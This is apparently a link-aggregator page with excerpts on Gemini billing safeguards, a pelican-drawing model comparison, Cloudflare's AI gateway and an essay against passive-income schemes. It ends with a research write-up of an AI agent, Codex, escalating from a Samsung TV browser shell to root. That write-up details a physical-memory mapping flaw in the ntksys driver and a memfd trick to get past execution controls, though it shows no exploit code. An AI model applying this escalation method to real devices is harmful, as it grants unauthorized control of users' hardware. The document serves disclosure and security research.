We worked with Google Cloud sup­port and pro­vided logs and analy­sis. The charges were clas­si­fied as valid us­age be­cause they orig­i­nated from our pro­ject, and our re­quest for a billing ad­just­ment was ul­ti­mately de­nied.

This us­age was clearly anom­alous, not user-dri­ven, and does not re­flect in­tended or mean­ing­ful con­sump­tion of the ser­vice.

Has any­one en­coun­tered a sim­i­lar is­sue af­ter en­abling Firebase AI Logic or Gemini?

Are there rec­om­mended safe­guards be­yond App Check, quo­tas, and mov­ing calls server-side?

Is there any es­ca­la­tion path we may have missed for cases like this?

Any guid­ance or shared ex­pe­ri­ence would be greatly ap­pre­ci­ated.

Hey @zanbezi ! Sorry to hear about this. A few things:

We have billing ac­count caps rolled out to users of the Gemini API, see: https://​ai.google.dev/​gem­ini-api/​docs/​billing#tier-spend-caps, tier 1 users can spend $250 a month and then are cut off by de­fault (there is a 10 minute de­lay in all of the re­port­ing)

We now support project spend caps; if you want to set a custom spend cap, you can also do that (I have my account set at $50 so I don’t spend too much accidentally when building, the same 10 minute delay applies here too): https://ai.google.dev/gemini-api/docs/billing#project-spend-caps

We are mov­ing to dis­able the us­age of un­re­stricted API keys in the Gemini API, should have more up­dates there soon.

We now gen­er­ate Auth keys by de­fault for new users (more se­cure key which did­n’t ex­ist when the Gemini API was orig­i­nally cre­ated a few years ago) and will have more to share there soon.

You should generally avoid putting a key in client-side code: if it is exposed, even with the restrictions above, you can incur costs.

In many cases, we can au­to­mat­i­cally de­tect when a key is vis­i­ble on the pub­lic web and shut down those keys au­to­mat­i­cally for se­cu­rity rea­sons (this hap­pened to me per­son­ally, I ac­ci­den­tally pushed my API key to the pub­lic API docs and it was shut down in min­utes).

By de­fault, keys gen­er­ated in Google AI Studio are re­stricted to just the Gemini API, no other ser­vices are en­abled. However keys gen­er­ated from other parts of Google Cloud have this cross ser­vice ca­pa­bil­ity, you can dou­ble check keys and make sure they are re­stricted for just the re­source you need.

Pls email me and our team can take a look into this case (Lkilpatrick@google.com), we take this all very seriously and have been pushing hard to land all the features mentioned above and more.

We just started the pre­paid billing roll­out which means you have to pay ahead of time to use the Gemini API, this is rolled out to all new US billing ac­counts as of yes­ter­day and rolling out glob­ally right now. This is yet an­other way to give de­vel­op­ers more con­trol over their spend­ing / costs and en­sure you know what you are sign­ing up for when us­ing the Gemini API.

I hope this helps and sorry for the has­sle on this ex­pe­ri­ence, pls email me if there is more to chat about!

Thanks for the de­tailed re­sponse, we re­ally ap­pre­ci­ate it. It is good to see that ad­di­tional safe­guards (like spend caps) are be­ing in­tro­duced.

I will reach out via email with the de­tails so your team can take a closer look.

Thanks again for tak­ing the time to re­spond.

Great to see you here Logan. This is the proper way to deal with a fi­asco like this one.

We work with com­pa­nies spend­ing $50K–$50M/year on cloud and see an av­er­age 33% over­spend. The fix usu­ally is­n’t bet­ter dash­boards — it’s hav­ing en­gi­neers ac­tu­ally re­view ar­chi­tec­ture and code along­side the billing data.

We’ve helped clients cut 25–60% by treat­ing it as an en­gi­neer­ing prob­lem, not a re­port­ing one. Happy to share more if use­ful.

...

Read the original on discuss.ai.google.dev »

6 368 shares, 30 trendiness

Qwen3.6-35B-A3B on my laptop drew me a better pelican than Claude Opus 4.7

For any­one who has been (inadvisably) tak­ing my pel­i­can rid­ing a bi­cy­cle bench­mark se­ri­ously as a ro­bust way to test mod­els, here are pel­i­cans from this morn­ing’s two big model re­leases—Qwen3.6-35B-A3B from Alibaba and Claude Opus 4.7 from Anthropic.

Here’s the Qwen 3.6 pel­i­can, gen­er­ated us­ing this 20.9GB Qwen3.6-35B-A3B-UD-Q4_K_S.gguf quan­tized model by Unsloth, run­ning on my MacBook Pro M5 via LM Studio (and the llm-lm­stu­dio plu­gin)—tran­script here:

And here’s one I got from Anthropic’s brand new Claude Opus 4.7 (transcript):

I’m giv­ing this one to Qwen 3.6. Opus man­aged to mess up the bi­cy­cle frame!

I tried Opus a sec­ond time pass­ing think­ing_level: max. It did­n’t do much bet­ter (transcript):

A lot of people are convinced that the labs train for my stupid benchmark. I don’t think they do, but honestly this result did give me a little glint of suspicion. So I’m burning one of my secret backup tests—here’s what I got from Qwen3.6-35B-A3B and Opus 4.7 for “Generate an SVG of a flamingo riding a unicycle”:

I’m giv­ing this one to Qwen too, partly for the ex­cel­lent SVG com­ment.

The pel­i­can bench­mark has al­ways been meant as a joke—it’s mainly a state­ment on how ob­tuse and ab­surd the task of com­par­ing these mod­els is.

The weird thing about that joke is that, for the most part, there has been a di­rect cor­re­la­tion be­tween the qual­ity of the pel­i­cans pro­duced and the gen­eral use­ful­ness of the mod­els. Those first pel­i­cans from October 2024 were junk. The more re­cent en­tries have gen­er­ally been much, much bet­ter—to the point that Gemini 3.1 Pro pro­duces il­lus­tra­tions you could ac­tu­ally use some­where, pro­vided you had a press­ing need to il­lus­trate a pel­i­can rid­ing a bi­cy­cle.

Today, even that loose con­nec­tion to util­ity has been bro­ken. I have enor­mous re­spect for Qwen, but I very much doubt that a 21GB quan­tized ver­sion of their lat­est model is more pow­er­ful or use­ful than Anthropic’s lat­est pro­pri­etary re­lease.

If the thing you need is an SVG il­lus­tra­tion of a pel­i­can rid­ing a bi­cy­cle though, right now Qwen3.6-35B-A3B run­ning on a lap­top is a bet­ter bet than Opus 4.7!

...

Read the original on simonwillison.net »

7 341 shares, 18 trendiness

Thunderbolt — AI You Control

...

Read the original on www.thunderbolt.io »

8 264 shares, 14 trendiness

an inference layer designed for agents

AI mod­els are chang­ing quickly: the best model to use for agen­tic cod­ing to­day might in three months be a com­pletely dif­fer­ent model from a dif­fer­ent provider. On top of this, real-world use cases of­ten re­quire call­ing more than one model. Your cus­tomer sup­port agent might use a fast, cheap model to clas­sify a user’s mes­sage; a large, rea­son­ing model to plan its ac­tions; and a light­weight model to ex­e­cute in­di­vid­ual tasks.

This means you need ac­cess to all the mod­els, with­out ty­ing your­self fi­nan­cially and op­er­a­tionally to a sin­gle provider. You also need the right sys­tems in place to mon­i­tor costs across providers, en­sure re­li­a­bil­ity when one of them has an out­age, and man­age la­tency no mat­ter where your users are.

These challenges are present whenever you’re building with AI, but they get even more pressing when you’re building agents. A simple chatbot might make one inference call per user prompt. An agent might chain ten calls together to complete a single task, and suddenly a single slow provider doesn’t add 50ms, it adds 500ms. One failed request isn’t just a retry; it’s a cascade of downstream failures.

Since launch­ing AI Gateway and Workers AI, we’ve seen in­cred­i­ble adop­tion from de­vel­op­ers build­ing AI-powered ap­pli­ca­tions on Cloudflare and we’ve been ship­ping fast to keep up! In just the past few months, we’ve re­freshed the dash­board, added zero-setup de­fault gate­ways, au­to­matic re­tries on up­stream fail­ures, and more gran­u­lar log­ging con­trols. Today, we’re mak­ing Cloudflare into a uni­fied in­fer­ence layer: one API to ac­cess any AI model from any provider, built to be fast and re­li­able.

Starting to­day, you can call third-party mod­els us­ing the same AI.run() bind­ing you al­ready use for Workers AI. If you’re us­ing Workers, switch­ing from a Cloudflare-hosted model to one from OpenAI, Anthropic, or any other provider is a one-line change.
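As a sketch of what that looks like in a Worker, assuming the binding behaves as described here: the Workers AI model name below is from the existing catalog, while the commented provider-prefixed identifier is a placeholder, since this post does not spell out the exact naming for third-party models.

// Sketch: the same AI.run() call, pointed at different models.
export default {
  async fetch(request: Request, env: { AI: Ai }): Promise<Response> {
    const prompt = "Classify this support ticket as billing, bug, or other.";

    // Cloudflare-hosted open model on Workers AI:
    const result = await env.AI.run("@cf/meta/llama-3.1-8b-instruct", { prompt });

    // Hypothetical third-party model through the same binding (identifier is a placeholder):
    // const result = await env.AI.run("openai/some-model", { prompt });

    return Response.json(result);
  },
};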

For those who don’t use Workers, we’ll be re­leas­ing REST API sup­port in the com­ing weeks, so you can ac­cess the full model cat­a­log from any en­vi­ron­ment.

We’re also ex­cited to share that you’ll now have ac­cess to 70+ mod­els across 12+ providers — all through one API, one line of code to switch be­tween them, and one set of cred­its to pay for them. And we’re quickly ex­pand­ing this as we go.

You can browse through our model catalog to find the best model for your use case, from open-source models hosted on Cloudflare Workers AI to proprietary models from the major model providers. We’re excited to be expanding access to models from Alibaba Cloud, AssemblyAI, Bytedance, Google, InWorld, MiniMax, OpenAI, Pixverse, Recraft, Runway, and Vidu — who will provide their models through AI Gateway. Notably, we’re expanding our model offerings to include image, video, and speech models so that you can build multimodal applications.

Accessing all your mod­els through one API also means you can man­age all your AI spend in one place. Most com­pa­nies to­day are call­ing an av­er­age of 3.5 mod­els across mul­ti­ple providers, which means no one provider is able to give you a holis­tic view of your AI us­age. With AI Gateway, you’ll get one cen­tral­ized place to mon­i­tor and man­age AI spend.

By in­clud­ing cus­tom meta­data with your re­quests, you can get a break­down of your costs on the at­trib­utes that you care about most, like spend by free vs. paid users, by in­di­vid­ual cus­tomers, or by spe­cific work­flows in your app.
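For example, here is a minimal sketch of tagging a request routed through AI Gateway with custom metadata, assuming the cf-aig-metadata request header that AI Gateway uses for per-request metadata; the account ID, gateway name, and metadata fields are placeholders:

// Sketch: tag a gateway request with the attributes you want to slice costs by.
// ACCOUNT_ID, GATEWAY_NAME, and the metadata fields are placeholders.
async function callThroughGateway(openaiKey: string): Promise<Response> {
  return fetch(
    "https://gateway.ai.cloudflare.com/v1/ACCOUNT_ID/GATEWAY_NAME/openai/chat/completions",
    {
      method: "POST",
      headers: {
        Authorization: `Bearer ${openaiKey}`,
        "Content-Type": "application/json",
        // Custom metadata shows up alongside cost and usage in gateway analytics.
        "cf-aig-metadata": JSON.stringify({
          plan: "paid",               // free vs. paid users
          customer_id: "cus_123",     // individual customer
          workflow: "support-triage", // which part of the app made the call
        }),
      },
      body: JSON.stringify({
        model: "gpt-4o-mini",
        messages: [{ role: "user", content: "Summarize this ticket." }],
      }),
    },
  );
}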

AI Gateway gives you ac­cess to mod­els from all the providers through one API. But some­times you need to run a model you’ve fine-tuned on your own data or one op­ti­mized for your spe­cific use case. For that, we are work­ing on let­ting users bring their own model to Workers AI.

The over­whelm­ing ma­jor­ity of our traf­fic comes from ded­i­cated in­stances for Enterprise cus­tomers who are run­ning cus­tom mod­els on our plat­form, and we want to bring this to more cus­tomers. To do this, we lever­age Replicate’s Cog tech­nol­ogy to help you con­tainer­ize ma­chine learn­ing mod­els.

Cog is de­signed to be quite sim­ple: all you need to do is write down de­pen­den­cies in a cog.yaml file, and your in­fer­ence code in a Python file. Cog ab­stracts away all the hard things about pack­ag­ing ML mod­els, such as CUDA de­pen­den­cies, Python ver­sions, weight load­ing, etc.

Example of a pre­dict.py file, which has a func­tion to set up the model and a func­tion that runs when you re­ceive an in­fer­ence re­quest (a pre­dic­tion):

from cog import BasePredictor, Path, Input

import torch


class Predictor(BasePredictor):
    def setup(self):
        """Load the model into memory to make running multiple predictions efficient"""
        self.net = torch.load("weights.pth")

    def predict(self,
        image: Path = Input(description="Image to enlarge"),
        scale: float = Input(description="Factor to scale image by", default=1.5)
    ) -> Path:
        """Run a single prediction on the model"""
        # … pre-processing …
        output = self.net(input)
        # … post-processing …
        return output

Then, you can run cog build to build your con­tainer im­age, and push your Cog con­tainer to Workers AI. We will de­ploy and serve the model for you, which you then ac­cess through your usual Workers AI APIs.

We’re work­ing on some big pro­jects to be able to bring this to more cus­tomers, like cus­tomer-fac­ing APIs and wran­gler com­mands so that you can push your own con­tain­ers, as well as faster cold starts through GPU snap­shot­ting. We’ve been test­ing this in­ter­nally with Cloudflare teams and some ex­ter­nal cus­tomers who are guid­ing our vi­sion. If you’re in­ter­ested in be­ing a de­sign part­ner with us, please reach out! Soon, any­one will be able to pack­age their model and use it through Workers AI.

Using Workers AI mod­els with AI Gateway is par­tic­u­larly pow­er­ful if you’re build­ing live agents — where a user’s per­cep­tion of speed hinges on time to first to­ken or how quickly the agent starts re­spond­ing, rather than how long the full re­sponse takes. Even if to­tal in­fer­ence is 3 sec­onds, get­ting that first to­ken 50ms faster makes the dif­fer­ence be­tween an agent that feels zippy and one that feels slug­gish.

Cloudflare’s net­work of data cen­ters in 330 cities around the world means AI Gateway is po­si­tioned close to both users and in­fer­ence end­points, min­i­miz­ing the net­work time be­fore stream­ing be­gins.

Workers AI also hosts open-source mod­els on its pub­lic cat­a­log, which now in­cludes large mod­els pur­pose-built for agents, in­clud­ing Kimi K2.5 and real-time voice mod­els. When you call these Cloudflare-hosted mod­els through AI Gateway, there’s no ex­tra hop over the pub­lic Internet since your code and in­fer­ence run on the same global net­work, giv­ing your agents the low­est la­tency pos­si­ble.

When build­ing agents, speed is not the only fac­tor that users care about — re­li­a­bil­ity mat­ters too. Every step in an agent work­flow de­pends on the steps be­fore it. Reliable in­fer­ence is cru­cial for agents be­cause one call fail­ing can af­fect the en­tire down­stream chain.

Through AI Gateway, if you’re call­ing a model that’s avail­able on mul­ti­ple providers and one provider goes down, we’ll au­to­mat­i­cally route to an­other avail­able provider with­out you hav­ing to write any failover logic of your own.

If you’re building long-running agents with Agents SDK, your streaming inference calls are also resilient to disconnects. AI Gateway buffers streaming responses as they’re generated, independently of your agent’s lifetime. If your agent is interrupted mid-inference, it can reconnect to AI Gateway and retrieve the response without having to make a new inference call or pay twice for the same output tokens. Combined with the Agents SDK’s built-in checkpointing, the end user never notices.

The Replicate team has of­fi­cially joined our AI Platform team, so much so that we don’t even con­sider our­selves sep­a­rate teams any­more. We’ve been hard at work on in­te­gra­tions be­tween Replicate and Cloudflare, which in­clude bring­ing all the Replicate mod­els onto AI Gateway and re­plat­form­ing the hosted mod­els onto Cloudflare in­fra­struc­ture. Soon, you’ll be able to ac­cess the mod­els you loved on Replicate through AI Gateway, and host the mod­els you de­ployed on Replicate on Workers AI as well.

To get started, check out our doc­u­men­ta­tion for AI Gateway or Workers AI. Learn more about build­ing agents on Cloudflare through Agents SDK.

...

Read the original on blog.cloudflare.com »

9 264 shares, 24 trendiness

The "Passive Income" trap ate a generation of entrepreneurs

I had cof­fee last year with a guy - I won’t use his real name - who told me he was building a busi­ness.” I asked what it did. Dropshipping jade face rollers.

I made him say it twice.

He’d found them on Alibaba for $1.20 each, and started sell­ing them through Shopify for $29.99. Never used one him­self. Didn’t re­ally know what they were for - some­thing about lym­phatic drainage? Reducing puffi­ness? He said lymphatic” the way you say a word you’ve only ever read and never heard out loud.

Some guy on YouTube said jade rollers were “trending,” the margins looked insane on paper, so he’d “built” a website with stock photos of a dewy-skinned woman rolling a green rock across her cheekbone and started running Facebook ads at $50 a day. Customers would email asking where their stuff was - shipping from Guangzhou, three to six weeks, sometimes way longer - and he’d copy-paste a response he found on a dropshipping subreddit. He had a Google Doc full of pre-written customer service replies.

Five months in, he was $800 in the hole.

He told me all this like he’d in­vented the wheel.

I bought him an­other cof­fee. I gen­uinely had no idea what else to do.

Jade Roller Guy has be­come my go-to ex­am­ple of some­thing that went dras­ti­cally, ter­ri­bly wrong with how a whole gen­er­a­tion of would-be en­tre­pre­neurs thought about work and money. A spe­cific ide­ol­ogy - I’ve been call­ing it Passive Income Brain - grabbed a huge chunk of the peo­ple who were, by tem­pera­ment and abil­ity, most likely to start real busi­nesses, and it gave them a com­pletely fucked set of pri­or­i­ties.

Somewhere between 2015 and 2022, “passive income” stopped being a boring financial planning term and became, I don’t know how else to put this, a salvation narrative. I mean that literally. There was an eschatology if you want to get nerdy about it. The Rapture was the day your “passive income” exceeded your monthly expenses and you could quit your job forever. People talked about it with that exact energy.

But, of course, the folks mak­ing any ac­tual in­come, of any kind, were the ones sell­ing courses about mak­ing pas­sive in­come. It was an ouroboros. It was an ouroboros that had in­cor­po­rated in Delaware and was run­ning Facebook ads.

The pitch went some­thing like: you, a sucker, cur­rently trade your time for money. This is what em­ploy­ees do, and em­ploy­ees are suck­ers. (I’m para­phras­ing, but not by much.) Smart peo­ple build SYSTEMS. A sys­tem is any­thing that gen­er­ates rev­enue with­out your on­go­ing in­volve­ment. Write an ebook. Build a drop­ship­ping store. Create an on­line course. Set up af­fil­i­ate web­sites.

The spe­cific ve­hi­cle does­n’t mat­ter be­cause the im­por­tant thing is­n’t what you build, it’s the struc­ture. You want a ma­chine that gen­er­ates cash while you sleep, and once you have that ma­chine, you are free.

Free to do what? Sit on a beach, ap­par­ently. Every sin­gle one of these peo­ple wanted to sit on a beach. I’ve never un­der­stood this. Have they been to a beach? There’s sand. It gets every­where. You can sit there for maybe three hours be­fore you want to do lit­er­ally any­thing else.

The al­lure is real. Who does­n’t want money that shows up while you sleep?

I’d fucking love that. I’d love it very much indeed. But “passive income” as an organizing philosophy for your entire business life, for how you think about work, is almost perfectly designed to produce garbage.

When you make “passivity” the thing you’re optimizing for, you stop caring about anything a customer might actually want. Caring is active. Caring takes time. Caring is work.

Giving a shit is, by de­f­i­n­i­tion, not pas­sive.

Between 2019 and 2021, roughly 700,000 new Shopify stores opened. The platform went from about a million merchants to 1.7 million in two years. About 90% of those stores failed within their first year. Which is really more a meat grinder than a business model…

We started drowning in a million businesses nobody was actually running. Dropshipping stores with six-week shipping times and customer service that was just copy-pasted templates. Guys who’d put their “brand name” - usually something like ZENITHPRO or AXELVIBE, always in all caps, always vaguely aggressive - on a garlic press identical to four hundred other garlic presses on the same Amazon page. AXELVIBE! For a garlic press!

And the af­fil­i­ate blogs! Hundreds of thou­sands of them, pumped full of SEO-optimized re­views of prod­ucts the au­thors had never touched, never even seen in per­son. A frac­tal of bull­shit that tech­ni­cally qual­i­fies as com­merce but puts zero dol­lars of ac­tual value into the world.

Leverage is real; I’m not dis­put­ing that. There is a dif­fer­ence be­tween trad­ing hours for dol­lars and build­ing some­thing that scales. Software does this. Publishing does this. You write a book once, sell it many times, no­body calls that a scam. Fine! That part they got right!

Where it went wrong is that the whole movement confused “build a good product that scales” with “build any mechanism that extracts money without you being involved.” I don’t think that confusion was accidental. I think the confusion was the point. Because if you’re teaching people to build real businesses, you have to sit with hard, boring questions about whether anyone actually wants what you’re selling. But if you’re teaching people to build “passive income streams” you can skip all of that and go straight to the fun tactical shit. How to run Facebook ads, how to set up a Shopify store in a weekend, how to write email sequences that manipulate people into buying things they don’t need.

Nobody talks enough about what the passive income movement did to the content quality of the entire internet. If you’ve tried to google “best [anything]” in the last five years and gotten a wall of nearly identical listicles, all with the same structure (“We tested 47 blenders so you don’t have to!”), all making the same recommendations, all linking to the same Amazon products, you’ve experienced the results.

Those ar­ti­cles weren’t writ­ten by peo­ple who cared whether you bought a good blender. They were writ­ten by peo­ple who cared whether you clicked their af­fil­i­ate link, be­cause that’s what gen­er­ated pas­sive in­come, and the in­cen­tives made hon­esty ac­tively coun­ter­pro­duc­tive.

The honest review of blenders is: “most blenders are fine, just get whatever’s on sale, the differences below $100 are basically meaningless.” That review generates zero affiliate revenue. So nobody wrote it.

Instead you got “The Vitamix A3500 is our #1 pick!” with a nice affiliate link, written by someone who has never blended anything in their life. Multiply this across every product category and you start to understand the informational desert we’ve been living in. We broke Google results, at least partly, because an army of passive income seekers had an incentive to flood the internet with plausible-sounding garbage.

I’ve met dozens of smart, ca­pa­ble peo­ple who had ac­tual en­ergy, and who spent their en­tire twen­ties bounc­ing be­tween pas­sive in­come schemes in­stead of build­ing real skills // real busi­nesses // real ca­reers. The pat­tern was al­ways the same: six months on a drop­ship­ping store, it fails, pivot to Amazon FBA, that fails, pivot to cre­at­ing a course about drop­ship­ping (because of course), and then the course does­n’t sell ei­ther be­cause by 2021 there were ap­prox­i­mately forty thou­sand courses about drop­ship­ping and the mar­ket had been sat­u­rated since be­fore they started.

And the whole time they were get­ting fur­ther and fur­ther from the thing that ac­tu­ally cre­ates eco­nomic value, which is: find a real prob­lem, solve it for real peo­ple, care enough to stick around and keep im­prov­ing. The bor­ing thing. The thing that takes years. The thing that is, to be ab­solutely clear about this, not pas­sive.

I once saw a guy ask whether he should start a dog walking business and the top response was something like “dog walking isn’t scalable, you should build a dog walking platform instead.” This person liked dogs! He liked walking! He lived in a neighborhood full of busy professionals with dogs!

But the Passive Income Brain thing had gotten so deep into how people talked about business online that “do the simple obvious thing that works for you” was considered naive, and “build a technology platform for an activity you’ve never actually done as a business” was considered smart.

The dog walk­ing guy could have been prof­itable in a week.

The app guy would have burned through his sav­ings in six months and ended up with a land­ing page and no users.

By 2020 the passive income world was absolutely crawling with grift: guys posing with rented Lamborghinis in YouTube thumbnails, “digital nomads” whose actual income came entirely from selling the dream of being a digital nomad to other aspiring digital nomads, podcast hosts interviewing each other in an endless circle of mutual promotion where everyone claimed to make $30K/month and nobody could explain what they actually produced. By 2021 or so it started to look like a distributed, socially acceptable MLM. The product was the dream of not working. The customers were people desperate enough to pay for it.

Not every­one in this world was cyn­i­cal. I gen­uinely be­lieve that. A lot of the peo­ple sell­ing pas­sive in­come con­tent be­lieved their own pitch. They’d had some real suc­cess with a niche site - pulled $3,000/month for a while, it does hap­pen - read the same books every­one else read, fig­ured okay, I’ll teach other peo­ple my sys­tem. Why not. I would have done the same thing at 24. I’m al­most sure of it.

But zoom out and what you had was just an enor­mous ma­chine con­vert­ing hu­man am­bi­tion into noise. Affiliate spam // drop­shipped junk // ebooks about pas­sive in­come // courses about courses. An en­tire layer of the in­ter­net that was noth­ing but con­fi­dent-sound­ing bull­shit pro­duced by peo­ple who had op­ti­mized for every­thing ex­cept mak­ing some­thing worth buy­ing.

The peo­ple near the top made money. Everyone else spent months or years chas­ing a mi­rage and came out with noth­ing but a Shopify sub­scrip­tion they for­got to can­cel. They thought they’d failed. They had­n’t failed. The sys­tem, every sys­tem, failed them.

What ac­tu­ally makes money has­n’t changed. You find some­thing peo­ple need. You get good at pro­vid­ing it. You charge a fair price and you keep show­ing up even when it’s te­dious and even when you don’t want to. You build re­la­tion­ships over years. You build rep­u­ta­tion over years. None of it is pas­sive, and none of it has ever been pas­sive! All of it re­volves around giv­ing a shit, day af­ter day, about some­thing spe­cific. I don’t think any­one has ever found a way around that and I don’t think any­one will.

The pas­sive in­come thing was a fan­tasy about not hav­ing to give a shit.

This is a ter­ri­ble foun­da­tion for pretty much any­thing.

The af­fil­i­ate SEO blogs are be­ing slaugh­tered right now by AI-generated con­tent. The peo­ple who spent years pro­duc­ing al­go­rith­mi­cally op­ti­mized con­tent of no value to hu­mans are get­ting out­com­peted by soft­ware that does the ex­act same thing, faster and cheaper. Facebook ad costs went through the roof and took the drop­ship­ping gold rush with them. The biggest pas­sive in­come gu­rus have al­ready piv­oted to sell­ing AI courses. The ma­chine keeps run­ning. It just swaps out the brochure.

But I’ve noticed more people talking about what I’d call “give a shit” businesses - people who make furniture, run plumbing companies, write software they actually use themselves. Stuff where the answer to “why does your business exist?” isn’t “to generate passive income for me.” This works a lot better than the laptop-on-the-beach grind.

Jade Roller Guy, if you’re out there: I hope you found some­thing real.

I hope it keeps you busy.

...

Read the original on www.joanwestenberg.com »

10 234 shares, 11 trendiness

Codex Hacked a Samsung TV

This post documents our research into using AI to hack hardware devices. We’d like to acknowledge OpenAI for partnering with us on this project. No TVs were seriously harmed during this research. One may have experienced mild distress from being repeatedly rebooted remotely by an AI.

We started with a shell inside the browser application on a Samsung TV, and a fairly simple question: if we gave Codex a reliable way to work against the live device and the matching firmware source, could it take that foothold all the way to root?

Codex had to enumerate the target, narrow the reachable attack surface, audit the matching vendor driver source, validate a physical-memory primitive on the live device, adapt its tooling to Samsung’s execution restrictions, and iterate until the browser process became root on a real compromised device.

We didn’t provide a bug or an exploit recipe. We provided an environment Codex could actually operate in, and the easiest way to understand it is to look at the pieces separately.

KantS2 is Samsung’s internal platform name for the Smart TV firmware used on this device model. The setup looked like this:

[1] Browser foothold: we already had code execution inside the browser application’s own security context on the TV, which meant the task was not “get code execution somehow” but “turn browser-app code execution into root.”

[2] Controller host: we had a separate machine that could build ARM binaries, host files over HTTP, and reach the shell session that was actually alive on the TV.

[3] Shell listener: the target shell was driven through tmux send-keys, which meant Codex had to inject commands into an already-running shell and then recover the results from logs instead of treating the TV like a fresh interactive terminal.

[4] Matching source release: we had the KantS2 source tree for the corresponding firmware family, which let Codex audit Samsung’s own kernel-driver code and then test those findings against the live device.

[5] Execution constraints: the target required static ARMv7 binaries, and unsigned programs could not simply run from disk because of Samsung Tizen’s Unauthorized Execution Prevention, or UEP.

[6] memfd wrapper: to work around UEP, we already had a helper that loaded a program into an anonymous in-memory file descriptor and executed it from memory instead of from a normal file path (a rough sketch of this pattern follows below).

With that setup, Codex’s loop was simple: inspect the source and session logs, send commands into the TV through the controller and the tmux-driven shell, read the results back from logs, and, when a helper was needed, build it on the controller, have the TV fetch it, and run it through memfd. A few short prompts made that operating loop explicit:

“SSH to @. This is the shell listener.”
“Use … wget … use the IP of the server.”
“The goal … is to find a vulnerability in this TV to escalate privilege to root.”
“It is either by device driver or publicly known vulnerabilities …”

We set the destination and left the route open.
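As for the memfd wrapper in [6]: a common way to build such a loader on Linux is memfd_create plus fexecve - copy the fetched static binary into an anonymous in-memory descriptor and execute it from there. The sketch below is only an illustration of that pattern, not the team’s actual wrapper; the names and argument handling are assumptions.

    /* Illustrative loader, not the wrapper from the post: copy a fetched
     * static binary into an anonymous in-memory fd and execute it from there,
     * so the program never needs an executable path on disk. */
    #define _GNU_SOURCE
    #include <fcntl.h>
    #include <stdio.h>
    #include <sys/mman.h>
    #include <sys/sendfile.h>
    #include <sys/stat.h>
    #include <unistd.h>

    int main(int argc, char **argv)
    {
        if (argc < 2) {
            fprintf(stderr, "usage: %s <static-binary> [args...]\n", argv[0]);
            return 1;
        }

        int memfd = memfd_create("loader", 0);    /* no path in any filesystem */
        if (memfd < 0) { perror("memfd_create"); return 1; }

        int src = open(argv[1], O_RDONLY);
        if (src < 0) { perror("open"); return 1; }

        struct stat st;
        if (fstat(src, &st) < 0) { perror("fstat"); return 1; }

        /* Copy the downloaded program into the memory-backed descriptor. */
        off_t off = 0;
        while (off < st.st_size) {
            if (sendfile(memfd, src, &off, st.st_size - off) <= 0) {
                perror("sendfile");
                return 1;
            }
        }

        /* Execute directly from the descriptor instead of a file path. */
        char *const envp[] = { NULL };
        fexecve(memfd, &argv[1], envp);
        perror("fexecve");                        /* only reached on failure */
        return 1;
    }

Anything built on the controller could then be fetched with wget on the TV and run through a helper like this, without ever presenting UEP with an on-disk executable.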
We did not point Codex at a driver, suggest physical memory, or mention kernel credentials, so it had to treat the session as a real privilege-escalation hunt rather than a confirmation exercise.

The second prompt narrowed the standard:

“… cross check the source to all vulnerabilities from that day onwards …”
“Make sure to THOROUGHLY check if a vulnerability actually still exists …”
“reachability (must be reachable as the browser user context).”
“Make sure to check for the actual availability of the attack surface in the live system …”

We raised the bar: the bug had to exist in the source, be present on the device, and be reachable from the browser shell. Codex’s output quickly narrowed into concrete candidates.

We then gave Codex the facts that would anchor the rest of the session: the browser process’s identity, the kernel version, the exposed device nodes, and the contents of /proc/cmdline. That bundle did most of the framing work. The browser identity defined the privilege boundary and later became part of the signature Codex used to recognize the browser process’s kernel credentials in memory. The kernel version narrowed the codebase, the device nodes defined the reachable interfaces, and /proc/cmdline later supplied the memory-layout hints for physical scanning.

Codex quickly zeroed in on a set of world-writable ntk* device nodes exposed to the browser shell. It focused on that driver family because it was loaded on the device, reachable from the browser shell, and present in the released source tree. Reading the matching ntkdriver sources is also where the Novatek link became clear: the tree is stamped throughout with Novatek Microelectronics identifiers, so these ntk* interfaces were not just opaque device names on the TV, but part of the Novatek stack Samsung had shipped. That gave the session a concrete direction.

At one point we had to give Codex a constraint that could easily have derailed the session: /proc/iomem was not available to it. /proc/iomem is one of the normal places to reason about physical memory layout, so losing it mattered. Codex responded by pivoting to another source of truth, /proc/cmdline. Those boot parameters were enough to reconstruct the main RAM windows for the later scan.

With the field narrowed to ntksys and ntkhdma, Codex audited the matching KantS2 source and found the primitive that made the rest of the session possible.

/dev/ntksys was a Samsung kernel-driver interface that accepted a physical address and a size from user space, stored those values in a table, and then mapped that physical memory back into the caller’s address space through mmap. That is what we mean here by a physmap primitive: a path that gives user space access to raw physical memory. The operational consequence was straightforward. If the browser shell could use ntksys this way, Codex would not need a kernel code-execution trick. It would only need a reliable kernel data structure to overwrite. From there, the path was no longer a kernel control-flow exploit, but a data-only escalation built on physical-memory access.

This is already a serious design error because ntksys is not a benign metadata interface. It is a memory-management interface. The driver interface is built around ST_SYS_MEM_INFO; its u32Start and u32Size fields come directly from user space.
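A minimal reconstruction of that request structure, using the two field names from the source (the exact types and any surrounding fields are an assumption), looks like:

    #include <stdint.h>

    /* Reconstruction of the interface described above, not the vendor header:
     * both fields are filled in by the caller and later trusted by mmap. */
    typedef struct {
        uint32_t u32Start;   /* physical start address, supplied from user space */
        uint32_t u32Size;    /* length of the region in bytes, also user-supplied */
    } ST_SYS_MEM_INFO;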
Those are the only two values an attacker needs to turn this interface into a raw physmap.

SET_MEM_INFO validates the slot, not the physical range. The critical write path is in ker_sys.c around line 1158. The driver checks whether the table index is valid. It does not check whether the requested physical range belongs to a kernel-owned buffer, whether it overlaps RAM, whether it crosses privileged regions, or whether the caller should be allowed to map it at all.

The corresponding map path is in ker_sys.c around line 1539. vma->vm_pgoff selects the slot, and the slot contents are attacker-controlled. The driver then passes the user-chosen PFN directly to vk_remap_pfn_range. At that point the kernel is no longer enforcing privilege separation for physical memory.

The second interface, ntkhdma, is not the core privilege-escalation bug, but it is useful operationally. It hands unprivileged code a known-good physical address that can be mapped through ntksys to prove the primitive works before touching arbitrary RAM.

Codex did not jump directly from source audit to final exploitation. It built a proof chain in stages. First it wrote a small helper to talk to /dev/ntkhdma and ask for the physical address of the device’s DMA (direct memory access) buffer. A DMA buffer is memory the driver uses for direct hardware access, and the key point here was not DMA itself but the fact that the driver was willing to hand an unprivileged process a real physical address. The first preserved success was exactly that: the driver returned a usable physical address to the browser shell.

